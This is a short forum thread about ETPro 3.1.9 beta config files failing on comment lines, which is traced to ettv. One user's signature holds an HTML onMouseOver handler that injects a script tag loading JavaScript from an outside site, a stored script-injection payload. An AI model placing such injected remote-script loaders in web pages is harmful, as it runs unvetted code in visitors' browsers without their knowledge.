3.1.9 beta: BUG: Config files breaking on comments

Discussion for any ET/ETPro/BayonET bugs or cheats you find...

Moderators: Forum moderators, developers

Post Reply
Zaedyn
Posts: 31
Joined: Thu Sep 30, 2004 6:01 pm
Location: Provo, UT
Contact:

3.1.9 beta: BUG: Config files breaking on comments

Post by Zaedyn »

I get:

Code: Select all

unknown cmd in line '# my config file'
and

Code: Select all

unknown cmd in line '// my config file'
whenver I try and use // or # for comments when exec'ing a cfg file. What are comments now? Sometimes, when it gives a lot of these comment error messages, it just stops parsing the cfg file, so I don't get half of my commands passed through. I've had to make uncommented versions of my cfg files.
--Zaedyn (aka josh)
User avatar
bani
Site Admin
Posts: 2780
Joined: Sun Jul 21, 2002 3:58 am
Contact:

Post by bani »

execing .cfg files are handled by the engine, etpro can't change that even if it wanted to.
User avatar
Rain
Posts: 635
Joined: Sat Aug 02, 2003 3:44 pm
Location: Muffin Laboratories
Contact:

Post by Rain »

If you're using ettv instead of etmain, though, I think bani broke comment parsing there... :wink:
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
Zaedyn
Posts: 31
Joined: Thu Sep 30, 2004 6:01 pm
Location: Provo, UT
Contact:

Post by Zaedyn »

Ah, that could explain it because I am indeed using ettv.x86 instead of etded.x86. Sorry, shouldn't have blamed it on etpro.
--Zaedyn (aka josh)
Post Reply